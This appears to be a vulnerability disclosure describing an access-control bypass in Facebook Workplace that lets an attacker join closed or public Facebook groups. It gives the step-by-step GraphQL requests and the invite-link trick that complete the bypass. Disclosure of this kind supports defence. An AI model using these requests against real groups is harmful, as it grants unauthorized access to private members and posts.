Become a member of closed & public groups
This bug allows an attacker to add himself as a member of closed & public groups using the Workplace platform.
1- Go to the Workplace platform:
https://work.facebook.com/work/admin/user_sets/
2- Create a people set:
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:11",actor_id:actorid,name:myset-test,external_id:}}&doc_id=1801011926626947
3- Add your work ID to the set you created:
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:12",actor_id:actorid,member_id:[work_profile_id],scim_company_group_id:[set_id_created]}}&doc_id=1690433404336349
4- Add your work profile to a normal group (a group on www.facebook.com, not on Workplace):
POST /api/graphql/ HTTP/1.1
Host: work.facebook.com
variables={input:{client_mutation_id:14",actor_id:actorid,rule_id:[set_id_created],groups_ids:[normal_group]}}&doc_id=1798717653514339
* normal_group *: a normal closed or public group on www.facebook.com (not on Workplace)
-
At this point the work user receives notifications about new posts and other group notifications,
but when visiting https://work-id.facebook.com/groups/[normal_group] they are redirected to
https://www.facebook.com/groups/[normal_group] as their personal profile (which is not a member of the group).
The solution: try to add the personal user to the group from the work platform.
Visit this link:
https://work-id.m.facebook.com/groups/members/search/?group_id=[normal_group]
You will see an "Invite via link" option:
https://fb.me/g/AAAAAAAAAA
Visit the link and you can join the group as the personal user (see all members, create posts).